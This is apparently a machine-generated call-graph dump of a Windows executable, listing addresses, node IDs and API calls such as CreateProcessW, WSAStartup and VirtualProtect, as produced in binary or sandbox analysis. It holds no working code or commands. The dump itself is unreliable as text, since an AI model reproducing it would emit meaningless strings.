af3d89 105246 a9c4cd 48 API calls 105245->105246 105247 af3d91 105246->105247 105278 a9c4da 105277->105278 105279 a9c4e7 105277->105279 105278->105245 105280 ab010a 48 API calls 105279->105280 105280->105278 105309 ad6d8a __wsetenvp 105308->105309 105310 ad6db3 GetFileAttributesW 105309->105310 105311 ad6dc5 GetLastError 105310->105311 105318 ad6de3 105310->105318 105312 ad6de7 105311->105312 105313 ad6dd0 CreateDirectoryW 105311->105313 105314 a93bcf 48 API calls 105312->105314 105312->105318 105313->105312 105313->105318 105315 ad6df7 _wcsrchr 105314->105315 105316 ad6d6d 48 API calls 105315->105316 105315->105318 105317 ad6e1b 105316->105317 105317->105318 105319 ad6e28 CreateDirectoryW 105317->105319 105318->104751 105319->105318 105321 a97e53 48 API calls 105320->105321 105322 ad78df 105321->105322 105323 aae617 48 API calls 105322->105323 105324 ad78eb 105323->105324 105325 ae267a 105324->105325 105326 ae26a4 __wsetenvp 105325->105326 105327 adf039 105326->105327 105328 ae26d8 105326->105328 105329 ae2763 105326->105329 105327->104759 105332 a939e8 48 API calls 2 library calls 105327->105332 105328->105327 105334 aadfd2 60 API calls 105328->105334 105329->105327 105335 aadfd2 60 API calls 105329->105335 105332->104759 105334->105328 105335->105329 105337 a9a9af 105336->105337 105340 a9a9ca 105336->105340 105338 a9b8a7 48 API calls 105337->105338 105339 a9a9b7 CharUpperBuffW 105338->105339 105339->105340 105340->104445 105342 a910f9 105341->105342 105343 b04c5a 105341->105343 105344 ab010a 48 API calls 105342->105344 105345 a91100 105344->105345 105346 a91121 105345->105346 105369 a9113c 48 API calls 105345->105369 105346->104470 105348->104454 105349->104474 105350->104474 105351->104474 105352->104448 105353->104454 105354->104509 105355->104498 105356->104498 105358->104509 105359->104481 105362->104509 105363->104474 105364->104474 105365->104474 105366->104509 105367->104494 105368->104509 105369->105346 105371 a9d89e 50 API calls 105370->105371 105372 a91a08 105371->105372 105373 a91a12 105372->105373 105374 b0db7d 105372->105374 105375 a984a6 81 API calls 105373->105375 105376 a97e53 48 API calls 105374->105376 105377 a91a1f 105375->105377 105378 b0db8d 105376->105378 105379 a9c935 48 API calls 105377->105379 105378->105378 105380 a91a2d 105379->105380 105381 a91dce 105380->105381 105382 a91de4 Mailbox 105381->105382 105383 b0db26 105382->105383 105387 a91dfd 105382->105387 105384 b0db2b IsWindow 105383->105384 105385 a91e51 105384->105385 105386 b0db3f 105384->105386 105385->104018 105449 a9200a 105386->105449 105388 a91e46 105387->105388 105390 a984a6 81 API calls 105387->105390 105388->105385 105392 b0db65 IsWindow 105388->105392 105393 a91e17 105390->105393 105392->105385 105392->105386 105396 a91f04 105393->105396 105397 a91f1a Mailbox 105396->105397 105398 a9c935 48 API calls 105397->105398 105399 a91f3e 105398->105399 105400 a9c935 48 API calls 105399->105400 105401 a91f49 105400->105401 105402 a97e53 48 API calls 105401->105402 105403 a91f59 105402->105403 105404 a9d3d2 48 API calls 105403->105404 105405 a91f87 105404->105405 105406 a9d3d2 48 API calls 105405->105406 105407 a91f90 105406->105407 105408 a9d3d2 48 API calls 105407->105408 105409 a91f99 105408->105409 105410 b02569 105409->105410 105411 a91fac 105409->105411 105459 ace4ea 60 API calls 3 library calls 105410->105459 105412 b02583 105411->105412 105414 a91fbe GetForegroundWindow 105411->105414 105450 a92016 105449->105450 105451 ab010a 48 API calls 105450->105451 105452 a92023 105451->105452 105453 a9197e 105452->105453 105454 a91990 105453->105454 105458 a919af _memmove 105453->105458 105457 ab010a 48 API calls 105454->105457 105455 ab010a 48 API calls 105456 a919c6 105455->105456 105456->105385 105457->105458 105458->105455 105459->105412 105494->104057 105503 aeae3b 105495->105503 105498 aead05 Mailbox 105499 aead31 htons 105498->105499 105500 aead1b 105498->105500 105499->105500 105500->104079 105502 add7f2 105501->105502 105502->104086 105504 a9a6d4 48 API calls 105503->105504 105505 aeae49 105504->105505 105508 aeae79 WideCharToMultiByte 105505->105508 105507 aeacf3 inet_addr 105507->105498 105509 aeae9d 105508->105509 105510 aeaea7 105508->105510 105511 aaf324 48 API calls 105509->105511 105512 ab010a 48 API calls 105510->105512 105515 aeaea5 105511->105515 105513 aeaeae WideCharToMultiByte 105512->105513 105514 aaf2d0 48 API calls 105513->105514 105514->105515 105515->105507 105517 a93334 105516->105517 105519 a93339 Mailbox 105516->105519 105518 a9342c 48 API calls 105517->105518 105518->105519 105525 a93347 105519->105525 105543 a9346e 48 API calls 105519->105543 105521 ab010a 48 API calls 105523 a933d8 105521->105523 105522 a93422 105522->104136 105524 ab010a 48 API calls 105523->105524 105526 a933e3 105524->105526 105525->105521 105525->105522 105526->104136 105526->105526 105527->104145 105528->104145 105530 ab010a 48 API calls 105529->105530 105531 a9818f 105530->105531 105531->104145 105532->104145 105533->104135 105534->104135 105535->104135 105536->104145 105537->104153 105538->104154 105539->104118 105540->104113 105541->104133 105542->104137 105543->105525 105545 aaf069 105544->105545 105546 aaf057 105544->105546 105549 a9c4cd 48 API calls 105545->105549 105547 aaf05d 105546->105547 105548 aaf063 105546->105548 105551 a9a6d4 48 API calls 105547->105551 105552 a9a6d4 48 API calls 105548->105552 105550 ad64f5 105549->105550 105559 ad6524 105550->105559 105604 ad649b ReadFile SetFilePointerEx 105550->105604 105605 a9bd2f 48 API calls _memmove 105550->105605 105553 aaf081 105551->105553 105554 ad668b 105552->105554 105579 a94c4f 105553->105579 105557 a94c4f 50 API calls 105554->105557 105558 ad6699 105557->105558 105563 ad66a9 Mailbox 105558->105563 105606 ad6765 50 API calls 105558->105606 105559->104190 105560 b049b2 105563->104190 105566 aaf0a3 Mailbox 105566->104190 105568 a97bfb 105567->105568 105569 a97c3a 105567->105569 105571 ab010a 48 API calls 105568->105571 105570 a9c935 48 API calls 105569->105570 105572 a97c0e 105570->105572 105571->105572 105572->104195 105573->104165 105574->104196 105575->104168 105576->104166 105577->104187 105578->104194 105580 aaf324 48 API calls 105579->105580 105583 a94c60 105580->105583 105581 a94ca0 2 API calls 105581->105583 105582 a94c95 105582->105560 105585 a9c610 MultiByteToWideChar 105582->105585 105583->105581 105583->105582 105607 a94d29 105583->105607 105586 a9c638 105585->105586 105587 b024df 105585->105587 105588 ab010a 48 API calls 105586->105588 105589 a9c4cd 48 API calls 105587->105589 105590 a9c64f MultiByteToWideChar 105588->105590 105591 b024e7 105589->105591 105592 a9c66c 105590->105592 105593 a9c6b7 105590->105593 105596 a9a6f8 48 API calls 105591->105596 105592->105593 105597 a9c675 105592->105597 105594 a9a2fb 48 API calls 105593->105594 105595 a9c6c3 105594->105595 105595->105566 105598 b024f6 105596->105598 105597->105591 105600 a9c686 105597->105600 105599 ab010a 48 API calls 105598->105599 105601 b02518 105599->105601 105602 a9c68e _memmove 105600->105602 105603 ab010a 48 API calls 105600->105603 105602->105566 105603->105602 105604->105550 105605->105550 105606->105563 105608 a94d3d 105607->105608 105609 b045cf 105607->105609 105616 a94d67 105608->105616 105611 a9a6f8 48 API calls 105609->105611 105613 b045da 105611->105613 105612 a94d49 105612->105583 105614 ab010a 48 API calls 105613->105614 105615 b045ef _memmove 105614->105615 105617 a94d7d 105616->105617 105620 a94d78 _memmove 105616->105620 105618 b04703 105617->105618 105619 ab010a 48 API calls 105617->105619 105619->105620 105620->105612 105621->104214 105622->104216 105624 aadd89 105623->105624 105625 b04a7d FindFirstFileW 105623->105625 105624->103815 105626 b04a95 FindClose 105625->105626 105627 b04a8e 105625->105627 105627->105626 105629 ad7700 105628->105629 105640 ad76f9 _wcsncpy 105628->105640 105630 ab010a 48 API calls 105629->105630 105631 ad7706 GetFileVersionInfoW 105630->105631 105632 ad7722 __wsetenvp 105631->105632 105633 ab010a 48 API calls 105632->105633 105635 ad7739 _wcscat _wcscmp _wcscpy _wcsstr 105633->105635 105634 ab1bc7 _W_store_winword 59 API calls 105636 ad77f7 105634->105636 105638 ad7779 74D51560 105635->105638 105639 ad7793 _wcscat 105635->105639 105637 ad7827 74D51560 105636->105637 105636->105640 105637->105640 105641 ad783d _wcscmp 105637->105641 105638->105639 105639->105634 105640->104236 105641->105640 105643 ab234b 80 API calls 4 library calls 105641->105643 105643->105640 105645 af23eb _memset 105644->105645 105646 af2428 105645->105646 105647 af2452 105645->105647 105648 a9cdb4 48 API calls 105646->105648 105650 a9cdb4 48 API calls 105647->105650 105652 af2476 105647->105652 105651 af2433 105648->105651 105649 af24b0 105656 a984a6 81 API calls 105649->105656 105653 af2448 105650->105653 105651->105652 105654 a9cdb4 48 API calls 105651->105654 105652->105649 105655 a9cdb4 48 API calls 105652->105655 105658 a9cdb4 48 API calls 105653->105658 105654->105653 105655->105649 105657 af24d4 105656->105657 105659 a93bcf 48 API calls 105657->105659 105658->105652 105660 af24de 105659->105660 105661 af24e8 105660->105661 105662 af25a1 105660->105662 105664 a984a6 81 API calls 105661->105664 105663 af25d3 GetCurrentDirectoryW 105662->105663 105665 a984a6 81 API calls 105662->105665 105666 ab010a 48 API calls 105663->105666 105667 af24f9 105664->105667 105668 af25b8 105665->105668 105669 af25f8 GetCurrentDirectoryW 105666->105669 105670 a93bcf 48 API calls 105667->105670 105671 a93bcf 48 API calls 105668->105671 105672 af2605 105669->105672 105673 af2503 105670->105673 105675 af25c2 __wsetenvp 105671->105675 105677 a9ca8e 48 API calls 105672->105677 105684 af263e 105672->105684 105674 a984a6 81 API calls 105673->105674 105676 af2514 105674->105676 105675->105663 105675->105684 105678 a93bcf 48 API calls 105676->105678 105679 af261e 105677->105679 105680 af251e 105678->105680 105681 a9ca8e 48 API calls 105679->105681 105682 a984a6 81 API calls 105680->105682 105685 af262e 105681->105685 105686 af252f 105682->105686 105683 af268a 105688 af274c CreateProcessW 105683->105688 105689 af26c1 105683->105689 105684->105683 105722 ada17a 8 API calls 105684->105722 105690 a9ca8e 48 API calls 105685->105690 105691 a93bcf 48 API calls 105686->105691 105703 af276b 105688->105703 105725 acbc90 69 API calls 105689->105725 105690->105684 105694 af2539 105691->105694 105692 af2655 105723 ada073 8 API calls 105692->105723 105696 af256f GetSystemDirectoryW 105694->105696 105699 a984a6 81 API calls 105694->105699 105698 ab010a 48 API calls 105696->105698 105697 af2670 105724 ada102 8 API calls 105697->105724 105701 af2594 GetSystemDirectoryW 105698->105701 105702 af2550 105699->105702 105701->105672 105704 a93bcf 48 API calls 105702->105704 105706 af27bd CloseHandle 105703->105706 105707 af2780 105703->105707 105705 af255a __wsetenvp 105704->105705 105705->105672 105705->105696 105708 af27cb 105706->105708 105714 af27f5 105706->105714 105709 af2791 GetLastError 105707->105709 105726 ad9d09 CloseHandle Mailbox 105708->105726 105713 af27a5 105709->105713 105711 af27fb 105711->105713 105727 ad9b29 CloseHandle 105713->105727 105714->105711 105717 af2827 CloseHandle 105714->105717 105717->105713 105718 af1f2b 105718->103815 105721 af26df __wsetenvp 105721->105703 105722->105692 105723->105697 105724->105683 105725->105721 105727->105718 105728->104249 105730 a984a6 81 API calls 105729->105730 105731 aef7db 105730->105731 105732 aef81d Mailbox 105731->105732 105765 af0458 105731->105765 105732->104253 105734 aefa7c 105735 aefbeb 105734->105735 105736 aefa86 105734->105736 105800 af0579 89 API calls Mailbox 105735->105800 105778 aef5fb 105736->105778 105739 aefbf8 105739->105736 105741 aefc04 105739->105741 105740 a984a6 81 API calls 105758 aef875 Mailbox 105740->105758 105741->105732 105746 aefaba 105792 aaf92c 105746->105792 105749 aefaee 105752 a93320 48 API calls 105749->105752 105750 aefad4 105798 add520 86 API calls 4 library calls 105750->105798 105754 aefb05 105752->105754 105753 aefadf GetCurrentProcess TerminateProcess 105753->105749 105755 aa14a0 48 API calls 105754->105755 105764 aefb2f 105754->105764 105757 aefb1e 105755->105757 105756 aefc56 105756->105732 105761 aefc6f FreeLibrary 105756->105761 105799 af0300 105 API calls _free 105757->105799 105758->105732 105758->105734 105758->105740 105758->105758 105796 af28d9 48 API calls _memmove 105758->105796 105797 aefc96 60 API calls 2 library calls 105758->105797 105760 aa14a0 48 API calls 105760->105764 105761->105732 105763 a9d89e 50 API calls 105763->105764 105764->105756 105764->105760 105764->105763 105801 af0300 105 API calls _free 105764->105801 105766 a9b8a7 48 API calls 105765->105766 105767 af0473 CharLowerBuffW 105766->105767 105768 ae267a 60 API calls 105767->105768 105769 af0494 105768->105769 105771 a9d3d2 48 API calls 105769->105771 105776 af04cf Mailbox 105769->105776 105772 af04ac 105771->105772 105773 a97f40 48 API calls 105772->105773 105774 af04c3 105773->105774 105775 a9a2fb 48 API calls 105774->105775 105775->105776 105777 af050b Mailbox 105776->105777 105802 aefc96 60 API calls 2 library calls 105776->105802 105777->105758 105779 aef66b 105778->105779 105780 aef616 105778->105780 105784 af0719 105779->105784 105781 ab010a 48 API calls 105780->105781 105783 aef638 105781->105783 105782 ab010a 48 API calls 105782->105783 105783->105779 105783->105782 105785 af0944 Mailbox 105784->105785 105791 af073c _strcat _wcscpy __wsetenvp 105784->105791 105785->105746 105786 a9cdb4 48 API calls 105786->105791 105787 a9d00b 58 API calls 105787->105791 105788 a984a6 81 API calls 105788->105791 105789 ab45ec 47 API calls std::exception::_Copy_str 105789->105791 105791->105785 105791->105786 105791->105787 105791->105788 105791->105789 105803 ad8932 50 API calls __wsetenvp 105791->105803 105793 aaf941 105792->105793 105794 aaf9d9 select 105793->105794 105795 aaf9a7 105793->105795 105794->105795 105795->105749 105795->105750 105796->105758 105797->105758 105798->105753 105799->105764 105800->105739 105801->105764 105802->105777 105803->105791 105805 ae6b25 GetWindowRect 105804->105805 105806 ae6b42 105804->105806 105807 ae6b5c 105805->105807 105806->105807 105808 ae6b52 ClientToScreen 105806->105808 105807->104262 105807->104265 105808->105807 105809->104268 105810->104272 105812 a9c4cd 48 API calls 105811->105812 105813 ace2fe 105812->105813 105828 a9193b SendMessageTimeoutW 105813->105828 105815 ace305 105821 ace309 Mailbox 105815->105821 105829 ace390 105815->105829 105817 ace314 105818 ab010a 48 API calls 105817->105818 105819 ace338 SendMessageW 105818->105819 105820 ace34e _strlen 105819->105820 105819->105821 105822 ace378 105820->105822 105823 ace35a 105820->105823 105821->104284 105824 a97e53 48 API calls 105822->105824 105834 ace0f5 48 API calls 2 library calls 105823->105834 105824->105821 105826 ace362 105827 a9c610 50 API calls 105826->105827 105827->105821 105828->105815 105835 a9193b SendMessageTimeoutW 105829->105835 105831 ace39a 105832 ace39e 105831->105832 105833 ace3a2 SendMessageW 105831->105833 105832->105817 105833->105817 105834->105826 105835->105831 105836->104294 105837->104307 105838->104317 105839->104318 105840->104338 105841->104354 105842->104354 105843->104365 105844->104361 105845->104354 105846->104355 105848 ab4667 __calloc_impl 105847->105848 105853 ab45f8 __calloc_impl 105847->105853 105868 ab889e 47 API calls __getptd_noexit 105848->105868 105851 ab462b RtlAllocateHeap 105851->105853 105860 ab465f 105851->105860 105853->105851 105854 ab4653 105853->105854 105857 ab4651 105853->105857 105858 ab4603 105853->105858 105866 ab889e 47 API calls __getptd_noexit 105854->105866 105867 ab889e 47 API calls __getptd_noexit 105857->105867 105858->105853 105863 ab8e52 47 API calls 2 library calls 105858->105863 105864 ab8eb2 47 API calls 8 library calls 105858->105864 105865 ab1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 105858->105865 105860->103840 105861->103843 105862->103845 105863->105858 105864->105858 105866->105857 105867->105860 105868->105860 105869->103848 105870->103854 105871->103851 105872->103869 105873->103884 105874->103880 105875->103901 105876->103901 105877 aa3588 105886 aa308b 105877->105886 105878 aa35b0 105902 a9203a 413 API calls 105878->105902 105881 aed154 48 API calls 105881->105886 105882 b0848d 105907 add520 86 API calls 4 library calls 105882->105907 105883 b084b0 105895 aa32b9 105883->105895 105909 add520 86 API calls 4 library calls 105883->105909 105884 aa366d 105884->105895 105910 add520 86 API calls 4 library calls 105884->105910 105885 aa3665 105905 add520 86 API calls 4 library calls 105885->105905 105886->105878 105886->105881 105886->105882 105886->105885 105889 a93320 48 API calls 105886->105889 105893 aa31dc 105886->105893 105894 b08478 105886->105894 105897 a9fa40 413 API calls 105886->105897 105898 b084a4 105886->105898 105900 aa35f0 105886->105900 105903 aca599 InterlockedDecrement 105886->105903 105904 a9346e 48 API calls 105886->105904 105889->105886 105893->105883 105893->105884 105893->105895 105906 add520 86 API calls 4 library calls 105894->105906 105897->105886 105908 add520 86 API calls 4 library calls 105898->105908 105901 a9c935 48 API calls 105900->105901 105901->105893 105902->105893 105903->105886 105904->105886 105905->105895 105906->105895 105907->105895 105908->105883 105909->105895 105910->105895 105911 c3c140 105912 c3c150 105911->105912 105913 c3c26a LoadLibraryA 105912->105913 105917 c3c2af VirtualProtect VirtualProtect 105912->105917 105914 c3c281 105913->105914 105914->105912 105916 c3c293 GetProcAddress 105914->105916 105916->105914 105919 c3c2a9 ExitProcess 105916->105919 105918 c3c314 105917->105918 105918->105918 105920 ab6a80 105921 ab6a8c __getstream 105920->105921 105957 ab8b7b GetStartupInfoW 105921->105957 105923 ab6a91 105959 aba937 GetProcessHeap 105923->105959 105925 ab6ae9 105926 ab6af4 105925->105926 106044 ab6bd0 47 API calls 3 library calls 105925->106044 105960 ab87d7 105926->105960 105929 ab6afa 105930 ab6b05 __RTC_Initialize 105929->105930 106045 ab6bd0 47 API calls 3 library calls 105929->106045 105981 abba66 105930->105981 105933 ab6b14 105934 ab6b20 GetCommandLineW 105933->105934 106046 ab6bd0 47 API calls 3 library calls 105933->106046 106000 ac3c2d GetEnvironmentStringsW 105934->106000 105938 ab6b1f 105938->105934 105941 ab6b45 106013 ac3a64 105941->106013 105945 ab6b56 106027 ab1db5 105945->106027 105958 ab8b91 105957->105958 105958->105923 105959->105925 106052 ab1e5a 30 API calls 2 library calls 105960->106052 105962 ab87dc 106053 ab8ab3 InitializeCriticalSectionAndSpinCount 105962->106053 105964 ab87e1 105965 ab87e5 105964->105965 106055 ab8afd TlsAlloc 105964->106055 106054 ab884d 50 API calls 2 library calls 105965->106054 105968 ab87ea 105968->105929 105969 ab87f7 105969->105965 105970 ab8802 105969->105970 106056 ab7616 105970->106056 105973 ab8844 106064 ab884d 50 API calls 2 library calls 105973->106064 105976 ab8823 105976->105973 105978 ab8829 105976->105978 105977 ab8849 105977->105929 106063 ab8724 47 API calls 4 library calls 105978->106063 105980 ab8831 GetCurrentThreadId 105980->105929 105982 abba72 __getstream 105981->105982 106073 ab8984 105982->106073 105984 abba79 105985 ab7616 __calloc_crt 47 API calls 105984->105985 105987 abba8a 105985->105987 105986 abbaf5 GetStartupInfoW 105989 abbb0a 105986->105989 105990 abbc33 105986->105990 105987->105986 105988 abba95 @_EH4_CallFilterFunc@8 __getstream 105987->105988 105988->105933 105989->105990 105994 ab7616 __calloc_crt 47 API calls 105989->105994 105997 abbb58 105989->105997 105991 abbcf7 105990->105991 105993 abbc7c GetStdHandle 105990->105993 105995 abbc8e GetFileType 105990->105995 105996 abbcbb InitializeCriticalSectionAndSpinCount 105990->105996 106080 abbd0b RtlLeaveCriticalSection _doexit 105991->106080 105993->105990 105994->105989 105995->105990 105996->105990 105997->105990 105998 abbb8a GetFileType 105997->105998 105999 abbb98 InitializeCriticalSectionAndSpinCount 105997->105999 105998->105997 105998->105999 105999->105997 106001 ac3c3e 106000->106001 106002 ab6b30 106000->106002 106119 ab7660 47 API calls std::exception::_Copy_str 106001->106119 106007 ac382b GetModuleFileNameW 106002->106007 106005 ac3c64 _memmove 106006 ac3c7a FreeEnvironmentStringsW 106005->106006 106006->106002 106009 ac385f _wparse_cmdline 106007->106009 106008 ab6b3a 106008->105941 106047 ab1d7b 47 API calls 3 library calls 106008->106047 106009->106008 106010 ac3899 106009->106010 106120 ab7660 47 API calls std::exception::_Copy_str 106010->106120 106012 ac389f _wparse_cmdline 106012->106008 106014 ac3a7d __wsetenvp 106013->106014 106018 ab6b4b 106013->106018 106015 ab7616 __calloc_crt 47 API calls 106014->106015 106023 ac3aa6 __wsetenvp 106015->106023 106016 ac3afd 106017 ab28ca _free 47 API calls 106016->106017 106017->106018 106018->105945 106048 ab1d7b 47 API calls 3 library calls 106018->106048 106019 ab7616 __calloc_crt 47 API calls 106019->106023 106020 ac3b22 106023->106016 106023->106018 106023->106019 106023->106020 106024 ac3b39 106023->106024 106121 ac3317 47 API calls 2 library calls 106023->106121 106028 ab1dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 106027->106028 106044->105926 106045->105930 106046->105938 106052->105962 106053->105964 106054->105968 106055->105969 106059 ab761d 106056->106059 106058 ab765a 106058->105973 106062 ab8b59 TlsSetValue 106058->106062 106059->106058 106060 ab763b Sleep 106059->106060 106065 ac3e5a 106059->106065 106061 ab7652 106060->106061 106061->106058 106061->106059 106062->105976 106063->105980 106064->105977 106066 ac3e65 106065->106066 106071 ac3e80 __calloc_impl 106065->106071 106067 ac3e71 106066->106067 106066->106071 106072 ab889e 47 API calls __getptd_noexit 106067->106072 106069 ac3e90 RtlAllocateHeap 106070 ac3e76 106069->106070 106069->106071 106070->106059 106071->106069 106071->106070 106072->106070 106074 ab89a8 RtlEnterCriticalSection 106073->106074 106075 ab8995 106073->106075 106074->105984 106081 ab8a0c 106075->106081 106077 ab899b 106077->106074 106105 ab1d7b 47 API calls 3 library calls 106077->106105 106080->105988 106082 ab8a18 __getstream 106081->106082 106083 ab8a39 106082->106083 106084 ab8a21 106082->106084 106087 ab8aa1 __getstream 106083->106087 106098 ab8a37 106083->106098 106106 ab8e52 47 API calls 2 library calls 106084->106106 106086 ab8a26 106107 ab8eb2 47 API calls 8 library calls 106086->106107 106087->106077 106090 ab8a4d 106092 ab8a63 106090->106092 106093 ab8a54 106090->106093 106091 ab8a2d 106108 ab1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 106091->106108 106096 ab8984 __lock 46 API calls 106092->106096 106110 ab889e 47 API calls __getptd_noexit 106093->106110 106097 ab8a6a 106096->106097 106100 ab8a79 InitializeCriticalSectionAndSpinCount 106097->106100 106101 ab8a8e 106097->106101 106098->106083 106109 ab7660 47 API calls std::exception::_Copy_str 106098->106109 106099 ab8a59 106099->106087 106102 ab8a94 106100->106102 106111 ab28ca 106101->106111 106117 ab8aaa RtlLeaveCriticalSection _doexit 106102->106117 106106->106086 106107->106091 106109->106090 106110->106099 106112 ab28d3 RtlFreeHeap 106111->106112 106116 ab28fc __dosmaperr 106111->106116 106113 ab28e8 106112->106113 106112->106116 106118 ab889e 47 API calls __getptd_noexit 106113->106118 106115 ab28ee GetLastError 106115->106116 106116->106102 106117->106087 106118->106115 106119->106005 106120->106012 106121->106023 106908 b01edb 106913 a9131c 106908->106913 106914 a9133e 106913->106914 106947 a91624 106914->106947 106919 a9d3d2 48 API calls 106920 a9137e 106919->106920 106921 a9d3d2 48 API calls 106920->106921 106922 a91388 106921->106922 106923 a9d3d2 48 API calls 106922->106923 106924 a91392 106923->106924 106925 a9d3d2 48 API calls 106924->106925 106926 a913d8 106925->106926 106927 a9d3d2 48 API calls 106926->106927 106928 a914bb 106927->106928 106955 a91673 106928->106955 106993 a917e0 106947->106993 106950 a97e53 48 API calls 106951 a91344 106950->106951 106952 a916db 106951->106952 107007 a91867 6 API calls 106952->107007 106954 a91374 106954->106919 106956 a9d3d2 48 API calls 106955->106956 106957 a91683 106956->106957 106958 a9d3d2 48 API calls 106957->106958 106959 a9168b 106958->106959 107008 a97d70 106959->107008 107000 a917fc 106993->107000 106996 a917fc 48 API calls 106997 a917f0 106996->106997 106998 a9d3d2 48 API calls 106997->106998 106999 a9165b 106998->106999 106999->106950 107001 a9d3d2 48 API calls 107000->107001 107002 a91807 107001->107002 107003 a9d3d2 48 API calls 107002->107003 107004 a9180f 107003->107004 107005 a9d3d2 48 API calls 107004->107005 107006 a917e8 107005->107006 107006->106996 107007->106954 107009 a9d3d2 48 API calls 107008->107009 107010 a97d79 107009->107010 107015 b0c05b 107016 b0c05d 107015->107016 107019 ad78ee WSAStartup 107016->107019 107018 b0c066 107020 ad7917 gethostname gethostbyname 107019->107020 107021 ad79b1 _wcscpy 107019->107021 107020->107021 107022 ad793a _memmove 107020->107022 107021->107018 107023 ad7970 inet_ntoa 107022->107023 107027 ad7952 _wcscpy 107022->107027 107025 ad7989 _strcat 107023->107025 107024 ad79a9 WSACleanup 107024->107021 107028 ad8553 107025->107028 107027->107024 107029 ad8561 107028->107029 107030 ad8565 _strlen 107028->107030 107029->107027 107031 ad8574 MultiByteToWideChar 107030->107031 107031->107029 107032 ad858a 107031->107032 107033 ab010a 48 API calls 107032->107033 107034 ad85a6 MultiByteToWideChar 107033->107034 107034->107029 107035 a929c2 107036 a929cb 107035->107036 107037 a929e9 107036->107037 107038 a92a48 107036->107038 107039 a92a46 107036->107039 107040 a92aac PostQuitMessage 107037->107040 107041 a929f6 107037->107041 107043 b02307 107038->107043 107044 a92a4e 107038->107044 107042 a92a2b NtdllDefWindowProc_W 107039->107042 107048 a92a39 107040->107048 107046 a92a01 107041->107046 107047 b0238f 107041->107047 107042->107048 107090 a9322e 16 API calls 107043->107090 107049 a92a53 107044->107049 107050 a92a76 SetTimer RegisterClipboardFormatW 107044->107050 107052 a92a09 107046->107052 107053 a92ab6 107046->107053 107096 ad57fb 60 API calls _memset 107047->107096 107056 a92a5a KillTimer 107049->107056 107057 b022aa 107049->107057 107050->107048 107054 a92a9f CreatePopupMenu 107050->107054 107051 b0232e 107091 aaec33 413 API calls Mailbox 107051->107091 107059 b02374 107052->107059 107060 a92a14 107052->107060 107080 a91e58 107053->107080 107054->107048 107087 a92b94 Shell_NotifyIconW _memset 107056->107087 107063 b022e3 MoveWindow 107057->107063 107064 b022af 107057->107064 107059->107042 107095 acb31f 48 API calls 107059->107095 107066 a92a1f 107060->107066 107067 b0235f 107060->107067 107061 b023a1 107061->107042 107061->107048 107063->107048 107068 b022d2 SetFocus 107064->107068 107069 b022b3 107064->107069 107066->107042 107092 a92b94 Shell_NotifyIconW _memset 107066->107092 107094 ad5fdb 70 API calls _memset 107067->107094 107068->107048 107069->107066 107073 b022bc 107069->107073 107070 a92a6d 107088 a92ac7 DeleteObject DestroyWindow Mailbox 107070->107088 107089 a9322e 16 API calls 107073->107089 107076 b0236f 107076->107048 107078 b02353 107093 a93598 67 API calls _memset 107078->107093 107081 a91e6f _memset 107080->107081 107082 a91ef1 107080->107082 107097 a938e4 107081->107097 107082->107048 107084 a91eda KillTimer SetTimer 107084->107082 107085 a91e96 107085->107084 107086 b04518 Shell_NotifyIconW 107085->107086 107086->107084 107087->107070 107088->107048 107089->107048 107090->107051 107091->107066 107092->107078 107093->107039 107094->107076 107095->107039 107096->107061 107098 a93900 107097->107098 107118 a939d5 Mailbox 107097->107118 107099 a97b6e 48 API calls 107098->107099 107100 a9390e 107099->107100 107101 a9391b 107100->107101 107102 b0453f LoadStringW 107100->107102 107103 a97e53 48 API calls 107101->107103 107105 b04559 107102->107105 107104 a93930 107103->107104 107104->107105 107106 a93941 107104->107106 107120 a939e8 48 API calls 2 library calls 107105->107120 107108 a9394b 107106->107108 107109 a939da 107106->107109 107119 a939e8 48 API calls 2 library calls 107108->107119 107111 a9c935 48 API calls 107109->107111 107110 b04564 107113 b04578 107110->107113 107115 a93956 _memset _wcscpy 107110->107115 107111->107115 107121 a939e8 48 API calls 2 library calls 107113->107121 107117 a939ba Shell_NotifyIconW 107115->107117 107116 b04586 107117->107118 107118->107085 107119->107115 107120->107110 107121->107116 107122 b04ddc 107123 b04de6 VariantClear 107122->107123 107124 aa4472 107122->107124 107123->107124 107125 aa1118 107190 aae016 107125->107190 107127 aa112e 107128 aa1148 107127->107128 107129 b0abeb 107127->107129 107131 aa3680 413 API calls 107128->107131 107204 aacf79 49 API calls 107129->107204 107171 a9fad8 Mailbox _memmove 107131->107171 107133 b0ac2a 107136 b0ac4a Mailbox 107133->107136 107205 adba5d 48 API calls 107133->107205 107134 b0b628 Mailbox 107208 add520 86 API calls 4 library calls 107136->107208 107139 aa0119 107211 add520 86 API calls 4 library calls 107139->107211 107140 aa105e 107147 a9c935 48 API calls 107140->107147 107141 ab010a 48 API calls 107141->107171 107142 aa0dee 107145 a9d89e 50 API calls 107142->107145 107144 aa0dfa 107151 a9d89e 50 API calls 107144->107151 107145->107144 107146 b0b772 107212 add520 86 API calls 4 library calls 107146->107212 107164 a9fbf1 Mailbox 107147->107164 107148 aa1063 107210 add520 86 API calls 4 library calls 107148->107210 107149 a9f6d0 413 API calls 107149->107171 107150 a9c935 48 API calls 107150->107171 107154 aa0e83 107151->107154 107153 aca599 InterlockedDecrement 107153->107171 107159 a9caee 48 API calls 107154->107159 107155 a9d3d2 48 API calls 107155->107171 107157 b0b7d2 107158 ab1b2a 52 API calls __cinit 107158->107171 107170 aa10f1 Mailbox 107159->107170 107162 aa1230 107162->107164 107209 add520 86 API calls 4 library calls 107162->107209 107165 a9fa40 413 API calls 107165->107171 107168 b0b583 107206 add520 86 API calls 4 library calls 107168->107206 107207 add520 86 API calls 4 library calls 107170->107207 107171->107139 107171->107140 107171->107141 107171->107142 107171->107144 107171->107146 107171->107148 107171->107149 107171->107150 107171->107153 107171->107154 107171->107155 107171->107158 107171->107162 107171->107164 107171->107165 107171->107168 107171->107170 107172 af804e 113 API calls 107171->107172 107173 af798d 109 API calls 107171->107173 107174 af30ad 93 API calls 107171->107174 107175 aeb74b 413 API calls 107171->107175 107176 af17aa 87 API calls 107171->107176 107177 aaef0d 94 API calls 107171->107177 107178 a950a3 49 API calls 107171->107178 107179 af10e5 82 API calls 107171->107179 107180 aaf461 98 API calls 107171->107180 107181 ae8065 55 API calls 107171->107181 107182 ae9122 91 API calls 107171->107182 107183 ae92c0 88 API calls 107171->107183 107184 aadd84 3 API calls 107171->107184 107185 a981c6 85 API calls 107171->107185 107186 ae013f 87 API calls 107171->107186 107187 aaf03e 2 API calls 